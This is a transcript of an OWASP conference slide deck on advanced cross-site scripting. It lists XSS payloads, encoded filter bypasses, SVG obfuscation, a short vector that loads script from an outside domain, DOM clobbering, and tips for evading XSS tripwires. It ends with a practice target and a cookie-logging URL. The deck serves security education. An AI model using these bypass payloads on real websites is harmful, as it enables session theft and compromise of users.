Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists &...
Transcript of Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists &...
![Page 1: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/1.jpg)
Advanced XSSNicolas Golubovic
![Page 2: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/2.jpg)
![Page 3: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/3.jpg)
Image courtesy of chanpipat / FreeDigitalPhotos.net
![Page 4: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/4.jpg)
![Page 5: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/5.jpg)
1. Starter: reboiled XSS2. Course: spicy blacklists & filters3. Course: sweet content sniffing4. Course: salty defenses
a. httpOnly cookiesb. Content Security Policy (CSP)c. XSS Auditor
5. Dessert: tips and tricksa. DOM clobbering
6. Cookies?
Today's menu
![Page 6: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/6.jpg)
Reboiled XSS
Image courtesy of picture alliance
![Page 7: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/7.jpg)
Cross-site scripting<tag>...injection...</tag>or<a name="injection">anchor</a>
● the urge to alert(1)
![Page 8: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/8.jpg)
Cross-site scripting<tag>...<script>alert(1)</script>...</tag>or<a name="" onmouseover="alert(1)">anchor</a>
![Page 9: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/9.jpg)
Cross-site scripting
![Page 10: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/10.jpg)
Cross-site scripting
ways to execute scripts?
![Page 11: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/11.jpg)
Script tag<script>code</script>
<script src=//url></script>
<script src=//url defer></script>
![Page 12: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/12.jpg)
Event handlers<svg onload=alert(1)>
<input onfocus=alert(1) autofocus>
<img src=x onerror=alert(1)>
...
![Page 13: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/13.jpg)
Pseudo-handler<a href="javascript:alert(1)">a</a>
<iframe src="javascript:alert(1)"></iframe>
<object data="javascript:alert(1)"> FF
...
![Page 14: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/14.jpg)
eval and similareval('alert(1)');
setTimeout('alert(1)', 0);
CSS: expression(alert(1)); IE
...
![Page 15: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/15.jpg)
XSS● user-supplied data presented to users● XSS mostly a problem of insufficient
sanitization● Reflected● persistent● DOM-based
![Page 16: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/16.jpg)
Blacklists & filters
![Page 17: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/17.jpg)
Blacklists & filters
Request
urldecode,handle
Server
Response
![Page 18: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/18.jpg)
Blacklists & filters
Request
urldecode,handle
Server
Response
![Page 19: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/19.jpg)
Problems● DOM-based XSS● Server-side code does not really
"understand" client-side○ Browsers do transform response○ subtle differences between Browsers!
![Page 20: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/20.jpg)
Example● javascript:alert(1) considered evil?
![Page 21: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/21.jpg)
Example● javascript:alert(1) considered evil?
● maybejavascript:alert(1)less so ;-)
![Page 22: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/22.jpg)
Example● oh, alert(1) was the problem?
![Page 23: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/23.jpg)
Example● oh, so alert(1) was the problem?
● let's try\u0061\u006c\u0065\u0072\u0074(1)
![Page 24: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/24.jpg)
Yep, it's that ugly● javascr
ipt:\u0061\u006c\u0065\u0072\u0074(1)
![Page 25: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/25.jpg)
Even more...● decimal escapes with as many zeroes as
you want: a● : and other special entities● --> & <!-- = valid JavaScript comments● Non-alphanumeric JavaScript
-> hackvertor.co.uk (Gareth Heyes)
![Page 26: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/26.jpg)
...and more...● feed:javascript:,
feed:feed:javascript:,feed:feed... okay you get it(old Firefox versions)
● IE allows for rather interesting vectors:[0x01]javascript:, [0x02]javascript:
-> shazzer.co.uk (Gareth Heyes)
![Page 27: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/27.jpg)
...and SVG<svg><script><![CDATA[\]]><![CDATA[u0061]]><![CDATA[lert]]>(1)</script>
<svg><script>a<!>l<!>e<!>r<!>t<!>(<!>1<!>)</script>
(vectors by Mario Heiderich)
![Page 28: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/28.jpg)
Get the point?
Image courtesy of imagerymajestic / FreeDigitalPhotos.net
![Page 29: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/29.jpg)
Content sniffing
Image courtesy of photostock / FreeDigitalPhotos.net
![Page 30: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/30.jpg)
Content sniffing● browsers love markup● they try to recognize it where they can
-> "content sniffing"● IE behaved nasty
○ today hidden in "compatibility view"● want up-to-date results?
○ github.com/qll/DoesItSniff● another story: charset sniffing
![Page 31: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/31.jpg)
Chrome 27 sniffs...● when MIME-type is
○ unknown/unknown○ application/unknown○ foo or basically anything without a /
● when there is no MIME-type
● X-Content-Type-Options: nosniff works
![Page 32: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/32.jpg)
Firefox 21 sniffs...● when MIME-type is
○ foo or basically anything without a /■ even when asked not to
● when there is no MIME-type
● X-Content-Type-Options: nosniff works sometimes
![Page 33: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/33.jpg)
IE 10 sniffs...● when MIME-type is
○ application/octet-stream○ in compatibility view: text/plain
● when there is no MIME-type○ even when asked not to
● X-Content-Type-Options: nosniff works sometimes
![Page 34: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/34.jpg)
Defenses
![Page 35: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/35.jpg)
Defense in Depth?● regular defenses:
○ consistent charset○ HTML-encode in markup○ ...
● multiple layers of defense● so how good are they?
![Page 36: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/36.jpg)
httpOnly cookies● more attack surface than stealing cookies● unreadable for JavaScript / plugins● really?
![Page 37: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/37.jpg)
httpOnly cookies● more attack surface than stealing cookies● unreadable for JavaScript / plugins● really?● depends :-)● Prior to FF 16: LiveConnect
html5sec.org/java (Mario Heiderich)
![Page 38: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/38.jpg)
CSP● ambitious● eradicates most XSS used today● silver bullet?
![Page 39: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/39.jpg)
CSP● ambitious● eradicates most XSS used today● silver bullet?
○ JSONP○ scripting?
■ Zalewski: lcamtuf.coredump.cx/postxss■ Heiderich et al.: "Scriptless Attacks"
![Page 40: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/40.jpg)
XSS Auditor● XSS Filter in Chrome● aims to make reflected XSS harder● compares URL to HTTP response body● if matches are found they will be sanitized
![Page 41: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/41.jpg)
XSS Auditor● XSS Filter in Chrome● aims to make reflected XSS harder● compares URL to HTTP response body● if matches are found they will be sanitized● has been broken several times
![Page 42: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/42.jpg)
XSS Auditor● XSS Filter in Chrome● aims to make reflected XSS harder● compares URL to HTTP response body● if matches are found they will be sanitized● has been broken several times● can be used for an attack
○ selectively disable scripts
![Page 43: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/43.jpg)
Tips and tricks
![Page 44: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/44.jpg)
Tips and tricks<script>a = '</script><svg onload=alert(1)>';</script>
What will happen?
![Page 45: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/45.jpg)
Tips and tricks<script>a = '</script><svg onload=alert(1)>';</script>
What will happen? -> it will
-> </script> takes precedence
![Page 46: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/46.jpg)
Tips and tricks● short vectors with arbitrary code:
○ <svg onload=eval(URL) #\u2029alert(1)■ Chrome, IE, (Opera)■ Gareth Heyes & Stefano Di Paola
○ <svg onload=eval(window.name)○ <svg onload=eval(location.hash.slice(1))○ <script src=//ø.pw></script> #alert(1)
■ kudos to Mario Heiderich for the domain● without braces:
○ location=name
![Page 47: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/47.jpg)
Payload lifetime● payload dies when user navigates away :-(● even on same-origin navigation
![Page 48: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/48.jpg)
Payload lifetime● payload dies when user navigates away :-(● even on same-origin navigation● ideas of Heiderich & Kotowicz
○ iceqll.eu/poc/persistent.js■ 100%x100% iframe■ uses history.pushState / onpopstate
![Page 49: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/49.jpg)
XSS tripwires● be careful, tripwires are fashionable
○ don't test with alert(1)○ use anti-sandbox tricks
■ delete alert;alert(1)■ FF: Components.lookupMethod(window, 'alert')
(1)○ be creative!
![Page 50: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/50.jpg)
DOM clobbering?Access forms via their name:
<form name=a>content</form>
> document.a.innerHTML"content"
![Page 51: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/51.jpg)
DOM clobbering?What now?
<form name=querySelector>a</form>
![Page 52: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/52.jpg)
DOM clobbering?What now?
<form name=querySelector></form>
> document.querySelector<form name=querySelector></form>
![Page 53: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/53.jpg)
DOM clobbering!Consider this:
<div id=a></div><form name=querySelector></form><script>
var a = document.querySelector('#a');a.innerHTML = 'test';
</script>
![Page 54: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/54.jpg)
DOM clobbering!● <img name=body>● <form name=head>● <iframe name=whatever></iframe>● <form name=body>
<input name=firstChild>for document.body.firstChild
● ...
![Page 55: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/55.jpg)
Thank you
Questions?
![Page 56: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/56.jpg)
Let the fun begin
alertme.iceqll.eu/1
You can log stolen cookies and stuff here:http://l:[email protected]/
Slides: iceqll.eu/talks/advanced_xss
![Page 57: Advanced XSS - OWASP · 2020-01-17 · 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course: salty defenses a. httpOnly cookies](https://reader033.fdocuments.net/reader033/viewer/2022050523/5fa6b89e73f6aa19d321123f/html5/thumbnails/57.jpg)
Resources● Michal Zalewski: The Tangled Web,
lcamtuf.coredump.cx, Browser Security Handbook
● Publications by Mario Heiderich et al.,● Mario Heiderich: html5sec.org● @garethheyes: thespanner.co.uk● @kkotowicz: blog.kotowicz.net● @wisecwisec: code.google.
com/p/domxsswiki